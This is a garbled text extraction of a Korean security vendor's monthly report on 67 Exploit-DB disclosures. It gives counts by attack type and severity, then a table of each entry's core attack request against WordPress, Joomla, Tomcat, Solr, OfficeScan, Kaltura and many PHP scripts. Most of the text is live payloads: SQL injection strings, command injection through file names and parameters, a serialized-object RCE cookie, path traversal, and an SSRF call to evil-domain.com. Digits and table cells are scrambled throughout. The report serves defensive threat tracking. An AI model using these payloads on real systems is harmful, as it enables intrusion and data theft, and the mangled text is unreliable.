POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 207 년 0 월 Exploit-DB 에공개된은총 67 개입니다. 그중 SQL Injection 공격은총 5 개로가장많은수를차지했습니다. 이달의위험도가가장높은공격은 Command Injection 공격이었습니다. Command Injection 공격은의도하지않은시스템명령어를실행시킬수있는공격으로, 이번달공개된공격은주로 ) multipart/form-data 를활용한방식 2) JSON 형식으로명령어를삽입하는방식 3) 명령어를 base64 와 hash 로변조하는방식 4) 명령어가삽입된 xml 파일을참고하는방식등이있었습니다. 해당을예방하고지속적인보안을유지하기위해서는웹방화벽과시큐어코딩, 최신패치를통해심층방어 (Defense indepth) 구현을고려해야합니다.. 별보고개수 보고개수 RFI Information Disclosure File Upload 2 LFI 2 XSS 4 Command Injection 6 SQL Injection 5 총합계 67 60 50 40 30 20 0 0 별보고개수 5 6 4 2 2 RFI Information DisclosureFile Upload LFI XSS Command InjectionSQL Injection 위험도별분류 2. 위험도별분류 위험도 보고개수 백분율 상 6 9.04% 중 5 7.46% 하.49% 총합계 67 00.00% 5 상 중 하 6 3. 공격난이도별현황 공격난이도 보고개수 백분율 상 8.94% 중 37 55.22% 하 22 32.84% 총합계 67 00.00% 공격난이도별현황 8 22 37 상 중 하 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 Wordpress 2 PG All Share Video 2 Joomla 2 KeystoneJS 2 ClipBucket tpanel Complain Management Syste Apache Tomcat Website Broker EPESI itech Gigs ClipShare Vastal I-Tech Agent Zone Trend Micro OfficeScan AROX School ERP PHP Scrip Logitech Media Server FS Thumbtack 3CX Phone System Article Directory Career Portal Mailing List Manager Pro Apache Solr Same Sex Dating Software P Afian AB FileRun SoftDatepro Dating Social Net Check_MK ZeeBuddy CometChat US Zip Codes Database Kaltura FS Trademe Mura CMS FS Shutter Stock PHPMyFAQ D-Park Pro FS OLX PHP Melody FS Lynda Adult Pro FS Indiamart iproject Management Syste FS Groupon Job Board FS Freelancer MyBuilder FS Expedia PHP CityPortal FS Food Delivery Online Exam Test Applicatio FS Ebay Zomato FS Book Store Sokial Social Network Scrip FS Amazon Vastal I-Tech Dating Zone FS Car Rental Protected Links FS Realtor Shareet FS Crowdfunding Newspaper FS Care FS Monster 총합계 67 주요소프트웨어별발생현황 2 2 2 2 Wordpress PG All Share Video Joomla KeystoneJS ClipBucket tpanel Complain Management System Apache Tomcat Website Broker

POST /process.php HTTP/. 207-0-03 42950 XSS 중중 207-0-04 42954 Command Injection 상상 EPESI.8.2 rev2070830 - XSS ClipBucket 2.8.3 - Remote Code Execution history&url=_qf libs_qf_28b0ed42922c7ee22809bd346 95%3D%26submited%3D%26title%3D%253Ci%2520on click%253dalert()%253ealertme%253c%252fi%253e%26 status%3d0%26priority%3d%26permission%3d0%26long term%3d0%26deadline%255b date%255d%255bh%255 D%3D0%26deadline%255B date%255d%255bi%255d% 3D0%26deadline%255B datepicker%255d%3d%26timele ss%3d0%26employees%3d SEP 2%26customers search %3D%26customers%3D%26description%3D%26 action_ module %3D%252FBase_Box%257C0%252FUtils_RecordBr owser%257c5a323279e884f9fee3d734ad00393b_r POST /api/file_uploader.php HTTP/. user-agent: Mozilla/5.0 (Windows NT 0.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 298 Content-Type: multipart/form-data; boundary=2c2daae8c4d24d89840aa52253d280b --2c2daae8c4d24d89840aa52253d280b Content-Disposition: form-data; name="file_name" EPESI ClipBucket EPESI.8.2 rev2070830 ClipBucket 2.8.3 a.jpg;ls -al>../cache/.log;a.jpg --2c2daae8c4d24d89840aa52253d280b Content-Disposition: form-data; name="filedata"; filename="temp.jpg" Content-Type: image/jpg --2c2daae8c4d24d89840aa52253d280b-- 207-0-09 42967 SQL Injection 중상 ClipShare 7.0 - SQL /videos/animals' AND 5593=5593 AND 'LJPS'='LJPS ClipShare ClipShare 7.0 207-0-09 42966 File Upload 중상 Apache Tomcat < 9.0. (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - File Upload PUT /Poc.jsp HTTP/. <% out.println("aaaaaaaaaaaaaaaaaaaaaaaaaaaaa");% > Apache Tomcat Apache Tomcat < 9.0. (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 207-0-0 42968 SQL Injection 하상 Complain Management System - SQL injection /index.php?mod=admin&view=repod&id=plans WHERE 337=337 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x776767a7,(SELECT (ELT(4063=4063,))),0x77076627,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Complain Management System Complain Management System

207-0- 4297 Command Injection 상상 Trend Micro OfficeScan.0/XG (2.0) - Remote Code Execution POST /officescan/console/html/widget/proxy_controller.php HTTP/. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.) Cookie: LANG=en_US; LogonUser=root; wf_csrf_token=fb5b76f53eb8ea670c3f2d4906ff098; PHPSESSID=edir98ccf773n733cd3jvtor5; X-CSRFToken: fb5b76f53eb8ea670c3f2d4906ff098 ctype: application/x-www-form-urlencoded; charset=utf-8 Content-Type: application/x-www-form-urlencoded Content-Length: 602 Trend Micro OfficeScan Trend Micro OfficeScan.0/XG (2.0) module=modtmcss&serverid=&top=2>& ping 4.4.4.4 207-0-4 43024 XSS 하상 Logitech Media Server - XSS GET /%3Cbody%20onload=alert('Xss')%3E Logitech Media Server Logitech Media Server 207-0-6 4299 LFI 하중 3CX Phone System 5.5.3554. /api/supportinfo?file=/var/lib/3cxpbx/instance/bin/3cxphone - Information Disclosure System.ini 3CX Phone System 3CX Phone System 5.5.3554. 207-0-7 4302 SQL Injection 하상 Wordpress Plugin Car Park Booking - SQL /booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=2 Wordpress Wordpress Plugin Car Park Booking 207-0-7 430 SQL Injection 중상 Career Portal.0 - SQL Injection POST /job HTTP/. keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x76b6a77,0x5945476464547 2686855056467764674e59726f4252436844774f4704a50 7353574e4b6d5a5973,0x7787a787),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL-- zand&location_name[]= Career Portal Career Portal.0

207-0-7 43009 Command Injection 상상 POST /solr/newcollection/config HTTP/. Apache Solr 7.0. - XML { External Entity Expansion / "add-listener" : { Remote Code Execution "event":"postcommit", "name":"newlistener", "class":"solr.runexecutablelistener", "exe":"curl", "dir":"/usr/bin/", "args":["http://localhost:4444/executed"] } } Apache Solr Apache Solr 7.0. 207-0-8 4305 File Upload 하상 Afian AB FileRun 207.03.8 - File Upload POST /?module=fileman_myfiles&section=ajax&page=up HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=-------------------- -------7dd0029908f2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream Afian AB FileRun Afian AB FileRun 207.03.8 *web shell payload here* -----------------------------7dd0029908f2-- 207-0-8 4302 Information Disclosure 상 중 Check_MK.2.8p25 - Information Disclosure POST /check_mk/login.py HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=-------------------- -------7dd0029908f2 ---------------------------7dd0029908f2 Content-Disposition: form-data; name="filled_in" Check_MK Check_MK.2.8p25 login ---------------------------7dd0029908f2 Content-Disposition: form-data; name="_login" ---------------------------7dd0029908f2 Content-Disposition: form-data; name="_origtarget" 207-0-22 43027 LFI 중하 CometChat < 6.2.0 BETA - Local File Inclusion GET /cometchat/config.php?cmd=id HTTP/. Connection: keep-alive Cookie: cc_lang=../../etc/hosts CometChat CometChat < 6.2.0 BETA 207-0-23 43028 Command Injection 상상 Kaltura < 3..0 - Remote Code Execution GET /index.php/keditorservices/getallentries?list_type=5&entry_id =0_abc234 HTTP/. Accept-Encoding: identity Cookie: userzone=b%27ytoxontzoje6inoio086odoiwmvuzf9mb2ci OjE6e3M6MTE6IgAqAF93cml0ZXJzIjthOjE6e2k6MDtPOjIwOiJ azw5kx0xvz9xcml0zxjftwfpbci6ntp7czoxnjoiacoax2v2z W50cRvTWFpbCI7YToxOntpOjA7aToxO3zOjIyOiIAKgBfbGF 5b3V0RXZlbnRzVG9NYWlsIjthOjA6e3zOjg6IgAqAF9tYWlsIjtP Ojk6IlplbmRfTWFpbCI6MDp7fXM6MTA6IgAqAF9sYXlvdXQiO 086MTE6IlplbmRfTGF5b3V0IjozOntzOjEzOiIAKgBfaW5mbGVj dg9yijtpojizoijazw5kx0zpbhrlcl9qcmvnumvwbgfjzsi6mjp 7czoxNjoiACoAX2hdGNoUGF0dGVybiI7czo3OiIvKC4qKS9lIjtz OjEOiIAKgBfcmVwbGFjZWlbnQiO3M6MTk6InN5c3RlbSgna WQnKS5kaWUoKTsiO3zOjIwOiIAKgBfaW5mbGVjdG9yRW5h YmxlZCI7YjoxO3M6MTA6IgAqAF9sYXlvdXQiO3M6NjoibGF5b 3V0Ijt9czoyMjoiACoAX3NYmplY3RQcmVwZW5kVGV4dCI7Tj t9fx07fq%3d%3d%27c0ef0e89f9b57af86ae5b9d872cea6a ff05ba34c68ad292f86a30f87a35e9ba6e5052498394b250 f2ff983e4c30230ff86e760e708a8ef6e279f8a User-Agent: Python-urllib/3.5 Kaltura Kaltura < 3..0

207-0-23 43044 SQL Injection 중상 FS OLX - 'catg_id' SQL /search-result.php?searchbox=search&catg_id=5' AND 4453=4453 AND 'QlZa'='QlZa FS OLX FS OLX 207-0-23 43043 SQL Injection 하상 FS Lynda - 'category' SQL POST /tutorial/ HTTP/. FS Lynda FS Lynda category=5 AND 845=845&keywords=xxxxx 207-0-23 43042 SQL Injection 중상 FS Indiamart - 'keywords' SQL /search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x76b78707,0x50696776c6f7955068694 b454e736668707675627448527949566e434472706a72624 a466a5468,0x776277)-- LEhA&rctyp=Products FS Indiamart FS Indiamart 207-0-23 4304 SQL Injection 하상 FS Groupon - 'category' SQL /search_product.php?category= AND 832=832&name=xxxxx FS Groupon FS Groupon 207-0-23 43040 SQL Injection 하상 FS Freelancer - 'sk' SQL /category.php?sk=2 AND 5895=5895 FS Freelancer FS Freelancer

207-0-23 43039 SQL Injection 하상 FS Expedia - 'hid' SQL /hotel.php?hid=2 AND 6652=6652 FS Expedia FS Expedia 207-0-23 43038 SQL Injection 중상 POST /food/ HTTP/. FS Food Delivery - 'keywords' SQL FS Food Delivery FS Food Delivery keywords=xxxxx' AND (SELECT 2438 FROM(SELECT COUNT(*),CONCAT(0x77a786a7,(SELECT (ELT(2438=2438,))),0x7627787,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TkKa'='TkKa&order_option=&category=&price=000 207-0-23 43037 SQL Injection 중상 FS Ebay - /advance-search-result.php?keywords=any&pd_maincat_id=' 'pd_maincat_id' Parameter SQL AND 730=730 AND 'ixuk'='ixuk&submit=search FS Ebay FS Ebay 207-0-23 43036 SQL Injection 중상 FS Book Store - 'category' /book_search.php?book_name=xxxxx&category=4 AND SQL SLEEP(5) FS Book Store FS Book Store 207-0-23 43035 SQL Injection 중상 FS Amazon - /search.php?category_id= AND 'category_id' SQL Injection 취약 2635=2635&sub_category_id=&search=xxxxx 점 FS Amazon FS Amazon

207-0-23 43034 SQL Injection 중상 FS Car Rental - 'pickup_location' SQL Injection POST /vehicle/ HTTP/. pickup_location=7 AND (SELECT 7390 FROM(SELECT COUNT(*),CONCAT(0x77878767,(SELECT (ELT(7390=7390,))),0x7766a6a7,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&pickup_date=207-0-24 2:9:35&dropoff_date=207-0-24 2:9:36 FS Car Rental FS Car Rental 207-0-24 43052 SQL Injection 하상 FS Realtor - 'id' SQL /property_detail.php?id=29 AND 4599=4599 FS Realtor FS Realtor 207-0-24 4305 SQL Injection 하상 FS Crowdfunding - 'id' SQL /page_running_projects_details.php?id=' AND 539=539 AND 'Qkwz'='Qkwz FS Crowdfunding FS Crowdfunding 207-0-24 43050 SQL Injection 하상 FS Care - 'sitterservice' SQL /searchjob.php?sitterservice=' AND 2728=2728 AND 'fhir'='fhir FS Care FS Care 207-0-24 43049 SQL Injection 하상 FS Monster - 'id' SQL /Job_Details.php?id=6 AND 9364=9364 FS Monster FS Monster

207-0-24 43048 SQL Injection 하상 FS Trademe - 'id' SQL /property_details.php?id=2 AND 366=366 FS Trademe FS Trademe 207-0-24 43047 SQL Injection 하상 FS Thumbtack - 'ser' SQL /service-provider.php?ser=963' AND 860=860 AND 'ZarH'='ZarH FS Thumbtack FS Thumbtack 207-0-24 43046 SQL Injection 중상 POST /Category/ HTTP/. FS Shutter Stock - 'keywords' SQL FS Shutter Stock FS Shutter Stock keywords=search' AND (SELECT 2673 FROM(SELECT COUNT(*),CONCAT(0x76b706b7,(SELECT (ELT(2673=2673,))),0x7767a6b7,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UqZI'='UqZI&category=3 207-0-24 43045 RFI 상상 Mura CMS < 6.2 - Server-Side /tasks/feed/readrss.cfm?siteid=sitenamehere&rssurl=http:// Request Forgery / XML External evil-domain.com/file.xml&maxrssitems=500 Entity Mura CMS Mura CMS < 6.2

날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /contact HTTP/. Proxy-Connection: keep-alive Content-Length: 55 Cache-Control: max-age=0 Origin: http://demo.keystonejs.com Upgrade-Insecure-Requests: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0_2_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0.363.00 Safari/537.36 Accept: 207-0-25 43054 XSS 하 중 KeystoneJS 4.0.0-beta.5 - XSS text/html,application/xhtml+xml,application/xml;q=0.9,image/ KeystoneJS KeystoneJS webp,image/apng,*/*;q=0.8 4.0.0-beta.5 Referer: http://demo.keystonejs.com/contact Accept-Encoding: gzip, deflate Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.6,en;q=0.4 Cookie: language=en-us; this.sid=s%3axceh- 47H7d7iMsqSlbWKu6O503shViQv.EGD7m4ee4Hidmm0kG0S wj0n3kw38zq9kk2tdkzl%2bhpe; _cb_ls=; XSRF- TOKEN=oeJbz4SQn76540082cab675d96a48e963d507d4ce4f c7878b0; _ga=ga.2.8680866.508992556; _gid=ga.2.87506328.508992556; _cb=dxjgsdf_ctpb3kzz6; _chartbeat2=.50899258232.50899299653..bk_mb5dnx q69dkyrg0udhhlx2bkb; 207-0-25 43053 Command Injection 상상 KeystoneJS 4.0.0-beta.5 - CSV Excel Macro /keystone/api/galleries/export.csv?select=key,=cmd '/S'!A&so rt=&expandrelationshipfields=true KeystoneJS KeystoneJS 4.0.0-beta.5 207-0-28 43063 XSS 중중 PHPMyFAQ 2.9.8 - XSS POST /admin/attachment.php?action=save HTTP/. Proxy-Connection: keep-alive Content-Length: 855 Cache-Control: max-age=0 Origin: http://jen.demo.phpmyfaq.de Upgrade-Insecure-Requests: Content-Type: multipart/form-data; boundary=---- WebKitFormBoundaryKBj7nz2MHqNGoOt User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0_2_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0.363.00 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,image/apng,*/*;q=0.8 Referer: http://jen.demo.phpmyfaq.de/admin/attachment.php?record_ id=2&record_lang=ko Accept-Encoding: gzip, deflate Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.6,en;q=0.4 Cookie: pmf_sid=82; PHPSESSID=q2ovk43mqr6r3isoc7bgm2ttl0 PHPMyFAQ PHPMyFAQ 2.9.8 ------WebKitFormBoundaryKBj7nz2MHqNGoOt Content-Disposition: form-data; name="max_file_size" 207-0-28 43062 SQL Injection 중상 PHP Melody 2.6. - SQL /playlists.php?playlist=' UNION SELECT null,concat(0x223c2f63e3c2f64 69763e3c2f6469763e,version(),0 x3c22d2d),null,null,null,null,null,null,null,null,null-- PHP Melody PHP Melody 2.6.

207-0-30 430 SQL Injection 중상 D-Park Pro.0 - SQL Injection POST /admin/loginform.php HTTP/. D-Park Pro D-Park Pro.0 username=' UNION ALL SELECT 0x3,0x32,0x33,CONCAT(0x49485344e2053454e4344e)-- Ver Ayari&password=234567 207-0-30 4300 SQL Injection 중상 Adult Pro 2.2.4 - SQL /download/verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x76a77a7,(SELECT (ELT(4247=4247,))),0x77a70707,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Adult Pro Adult Pro 2.2.4 207-0-30 43099 SQL Injection 중상 Article Directory 3.0 - 'id' SQL /category.php?id=8++/*!02222union*/+(/*!02222select*/ +0x28329,/*!02222CONCAT_WS*/(0x203a20,USER(),DATA BASE(),VERSION()),0x283329,0x283429,0x30783238333532 39)-- Article Directory Article Directory 3.0 207-0-30 43098 SQL Injection 하상 iproject Management System.0 - 'ID' SQL /index.php?cmd=agent&mod=true&id=%20and%20=-- iproject Management System iproject Management System.0 207-0-30 43096 SQL Injection 중상 itech Gigs.2 - SQL /browse-scategory.php?sc=- 2c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN */(/*!08888SELECT*/+0x28329,0x283229,0x283329,0x283 429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@: =0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_ schema.columns)where@:=export_set(5,export_set(5,@,/*!08 888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0 xa3a,2)),@,2)),0x283829,0x283929,0x2833029)-- itech Gigs itech Gigs.2

207-0-30 43095 SQL Injection 하상 Job Board - 'nice_theme' SQL /index.php?nice_theme=%20and%20=-- Job Board Job Board 207-0-30 43094 SQL Injection 중상 /index.php?option=com_ns_downloadshop&task=invoice.crea Joomla! Component NS te&id=(select (CASE WHEN (5078=5078) THEN 5078 ELSE Download Shop 2.2.6 - 'id' SQL 5078*(SELECT 5078 FROM Injection INFORMATION_SCHEMA.PLUGINS) END)) Joomla Joomla! Component NS Download Shop 2.2.6 207-0-30 43093 SQL Injection 중상 Joomla! Component Zh YandexMap 6...0 - 'placemarklistid' SQL Injection /index.php?option=com_zhyandexmap&view=zhyandexmap&t mpl=component&id=3&placemarklistid=-864) OR 503=503 Joomla Joomla! Component Zh YandexMap 6...0 207-0-30 43092 SQL Injection 중상 Mailing List Manager Pro 3.0 - SQL /admin/users/?sort=login&edit=- 2'++/*!03333UNION*/(/*!03333SELECT*/0x28329,0x28322 9,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x28 3529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03 333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x28392 9,0x2833029,0x283329,0x2833229,0x2833329,0x283 3429)-- Mailing List Manager Pro Mailing List Manager Pro 3.0 207-0-30 4309 SQL Injection 중상 MyBuilder.0 - 'subcategory' SQL /phpsqlsearch_genxml.php?subcategory='++and(/*!09999s ELeCT*/+0x3078333+/*!09999FrOM*/+(/*!09999SeLeCT*/ +count(*),/*!09999concat*/((select(select+/*!09999co NCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x49687366E53 656e6366e))+fROM+iNFORMATION_sCHEMA.tABLES+wHER E+tABLE_sCHEMA=dATABASE()+lIMIT+0,),fLOOR(rAND(0)*2 ))x+from+information_schema.tables+group+by+x)a) AND ''=' MyBuilder MyBuilder.0

207-0-30 43090 SQL Injection 중상 PG All Share Video.0 - SQL /search/tag/verayari' AND 2686=2686 AND 'UsmZ'='UsmZ PG All Share Video PG All Share Video.0 207-0-30 43089 SQL Injection 중상 PHP CityPortal 2.0 - SQL /index.php?page=news&nid=' OR NOT 666=666# PHP CityPortal PHP CityPortal 2.0 207-0-30 43088 SQL Injection 중상 Same Sex Dating Software Pro.0 - SQL /viewmessage.php?sender_id=- 263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT* /+0x3,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!0888 8sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOl umns)where@:=export_set(5,export_set(5,@,/*!08888table_ name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)), @,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x330,0x33,0x332,0x333,0x334,0x335,0x336-- Same Sex Dating Software Pro Same Sex Dating Software Pro.0 207-0-30 43070 SQL Injection 중상 Online Exam Test Application - 'sort' SQL /resources.php?action=category&sort=- 8++/*!07777UNION*/+/*!07777SELECT*/+0x3,0x32,0x496 87366e2053656e6366e,(/*!07777Select*/+export_set(5,@: =0,(/*!07777select*/+count(*)/*!07777from*/(information_s chema.columns)where@:=export_set(5,export_set(5,@,/*!077 77table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa 3a,2)),@,2))-- Online Exam Test Application Online Exam Test Application 207-0-30 43068 SQL Injection 하상 Vastal I-Tech Agent Zone - SQL /searchcommercial.php?property_type=&city=-769 OR GROUP BY CONCAT(0x7778767,(SELECT (CASE WHEN (2860=2860) THEN ELSE 0 END)),0x7766a707,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by= Vastal I-Tech Agent Zone Vastal I-Tech Agent Zone

207-0-30 43067 SQL Injection 중상 /status_list.php?status_id=- Website Broker - 2'++/*!50000UNION*/+/*!50000SELECT*/+,2,CONCAT_W 'status_id' SQL S(0x203a20,USER(),DATABASE(),VERSION()),4,5-- Website Broker Website Broker 207-0-30 43066 SQL Injection 하상 Zomato - 'resid' SQL /restaurant-menu.php?resid=- 539'+++/*!02222UNION*/+/*!02222SELECT*/+0x3,0x32,0x 33,0x34,0x35,0x36,0x37,0x38,0x39,0x330,(/*!02222Select* /+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222fro Zomato Zomato m*/(information_schema.columns)where@:=export_set(5,exp ort_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222c olumn_name*/,0xa3a,2)),@,2)),0x332,0x333,0x334-- 207-0-30 43065 Command Injection 상상 WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object GET http://vbox-ubuntu-server.me/wordpress/wpadmin/admin-ajax.php?action=upcp_add_to_car HTTP/. Content-type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,image/apng,*/*;q=0.8 Cookie: upcp_cart_products=o:20: PHP_Object_Injection ::{s:7: host_ip ;s:4: ls -la ;} Wordpress WordPress Plugin Ultimate Product Catalog 4.2.24 207-0-30 43087 SQL Injection 중상 SoftDatepro Dating Social Network.3 - SQL /viewmessage.php?sender_id=- 263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT* /+0x3,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!0888 8sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOl umns)where@:=export_set(5,export_set(5,@,/*!08888table_ name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)), @,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x330,0x33,0x332,0x333,0x334,0x335,0x336-- SoftDatepro Dating Social Network SoftDatepro Dating Social Network.3 207-0-30 43086 SQL Injection 중상 Sokial Social Network.0 - SQL /admin/members_view.php?id=227+and(/*!00033select*/+ 0x3078333+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/ *!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0 x7e,0x49687366e53656e6366e))+/*!00033from*/+infor MATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEM A=dATABASE()+lIMIT+0,),fLOOR(/*!00033rAND*/(0)*2))x+/ *!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+b Y+x)a)+/*!00033aNd*/+= Sokial Social Network Sokial Social Network.0

207-0-30 43085 SQL Injection 하상 tpanel 2009 - SQL POST /login.php HTTP/. tpanel tpanel 2009 User= 'or = or ''='&Pass=23456 207-0-30 43084 SQL Injection 중상 Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection /add_to_cart.php?product_id=product_id=3 AND (SELECT 597 FROM(SELECT COUNT(*),CONCAT(0x776626a7,(SELECT (ELT(597=597,))),0x776b77,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Vastal I-Tech Dating Zone Vastal I-Tech Dating Zone 0.9.9 207-0-30 43083 SQL Injection 중상 ZeeBuddy 2x - 'groupid' SQL /admin/editadgroup.php?groupid=- ++/*!00009UNION*/+/*!00009SELECT*/+0x3,0x32,0x33,0 x34,0x35,0x36,0x37,0x38,(select+group_concat(0x5573 65726e66d653a,name,0x3c62723e,0x5067373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)-- ZeeBuddy ZeeBuddy 2x 207-0-30 43082 SQL Injection 하상 Protected Links - SQL Injection POST /index.php HTTP/. Protected Links Protected Links username=' UNION ALL SELECT,CONCAT(VERSiON(),0x49485344e2053454e4344e),3,4,C ONCAT(0x49485344e2053454e4344e)--&password=Ver Ayari 207-0-30 4308 SQL Injection 중상 AROX School ERP PHP - 'id' SQL /office_admin/?pid=95&action=print_charactercertificate&id= 3 AND SLEEP(5) AROX School ERP PHP AROX School ERP PHP

207-0-30 43080 SQL Injection 중상 Shareet - 'photo' SQL Injection /?photo=sasihsirfe' AND SLEEP(5) AND 'DUqs'='DUqs Shareet Shareet 207-0-30 43079 SQL Injection 중상 US Zip Codes Database - 'state' SQL /index.php?action=lookupcounty&state='+/*!08888union*/+/*!08888select*/+(/*!0 8888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/ *!08888from*/(information_schema.columns)where@:=expor t_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2), /*!08888column_name*/,0xa3a,2)),@,2))-- US Zip Codes Database US Zip Codes Database 207-0-30 43078 SQL Injection 중상 Newspaper.0 - SQL Injection /admin/admin_process.php?act=editpollform&id=- 2'++/*!00022UNION*/+/*!00022SELECT*/+0x3,(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!0 8888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiO n(),database(),0x38,0x39,0x330,0x33,0x332-- Newspaper Newspaper.0 207-0-30 43090 SQL Injection 중상 PG All Share Video.0 - SQL /channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x770626b7,(SELECT (ELT(4458=4458,))),0x77678707,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT PG All Share Video PG All Share Video.0